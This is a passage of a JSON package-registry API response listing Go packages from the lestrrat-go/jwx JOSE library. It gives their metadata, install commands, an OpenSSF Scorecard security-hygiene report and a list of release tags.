ang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14436516,"name":"github.com/lestrrat-go/jwx/v2/internal/keyconv","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/internal","versions_count":32,"first_release_published_at":"2026-05-13T07:26:32.917Z","latest_release_published_at":"2026-05-13T07:26:32.917Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-13T07:26:38.434Z","created_at":"2026-05-13T07:25:50.001Z","updated_at":"2026-05-13T07:26:38.434Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/keyconv","install_command":"go get github.com/lestrrat-go/jwx/v2/internal/keyconv","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/keyconv#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-13T07:25:50.757Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.070147552151246,"dependent_packages_count":4.750509749023225,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.9103286505872354},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/internal/keyconv","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/keyconv","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/keyconv","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/internal/keyconv/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fkeyconv/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fkeyconv/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fkeyconv/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fkeyconv/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fkeyconv/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fkeyconv/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14460488,"name":"github.com/lestrrat-go/jwx/v2/jws","ecosystem":"go","description":"Package jws implements the digital signature on JSON based data\nstructures as described in https://tools.ietf.org/html/rfc7515\n\nIf you do not care about the details, the only things that you\nwould need to use are the following functions:\n\nTo sign, simply use `jws.Sign`. `payload` is a []byte buffer that\ncontains whatever data you want to sign. `alg` is one of the\njwa.SignatureAlgorithm constants from package jwa. For RSA and\nECDSA family of algorithms, you will need to prepare a private key.\nFor HMAC family, you just need a []byte value. The `jws.Sign`\nfunction will return the encoded JWS message on success.\n\nTo verify, use `jws.Verify`. It will parse the `encodedjws` buffer\nand verify the result using `algorithm` and `key`. Upon successful\nverification, the original payload is returned, so you can work on it.","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2","versions_count":32,"first_release_published_at":"2026-05-16T20:46:08.502Z","latest_release_published_at":"2026-05-16T20:46:08.502Z","latest_release_number":"v2.1.6","last_synced_at":"2026-05-16T20:46:14.395Z","created_at":"2026-05-16T20:45:15.934Z","updated_at":"2026-05-16T20:46:14.396Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jws","install_command":"go get github.com/lestrrat-go/jwx/v2/jws","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jws#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-16T20:45:16.686Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.059532431414583,"dependent_packages_count":4.740914073502298,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.90022325245844},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jws","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jws","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jws","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jws/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjws/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjws/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjws/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjws/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjws/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjws/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14415577,"name":"github.com/lestrrat-go/jwx/v2/jwa","ecosystem":"go","description":"Package jwa defines the various algorithm described in https://tools.ietf.org/html/rfc7518","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2","versions_count":32,"first_release_published_at":"2026-05-09T20:37:33.634Z","latest_release_published_at":"2026-05-09T20:37:33.634Z","latest_release_number":"v2.1.6","last_synced_at":"2026-06-10T02:32:02.170Z","created_at":"2026-05-09T20:36:45.433Z","updated_at":"2026-06-10T02:32:02.170Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwa","install_command":"go get github.com/lestrrat-go/jwx/v2/jwa","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwa#section-documentation","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-09T20:36:47.013Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":5.080071416441731,"dependent_packages_count":4.759766986501993,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.919919201471862},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/jwa","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwa","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/jwa","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/jwa/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwa/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwa/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwa/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwa/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwa/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fjwa/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4260443,"name":"github.com/lestrrat-go/jwx/jwa/internal/cmd/gentypes","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/jwa/internal/cmd","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2026-03-14T00:47:26.602Z","latest_release_number":null,"last_synced_at":"2026-06-03T09:43:53.146Z","created_at":"2022-04-13T00:48:57.429Z","updated_at":"2026-06-03T09:43:53.146Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwa/internal/cmd/gentypes","install_command":"go get github.com/lestrrat-go/jwx/jwa/internal/cmd/gentypes","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/jwa/internal/cmd/gentypes#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go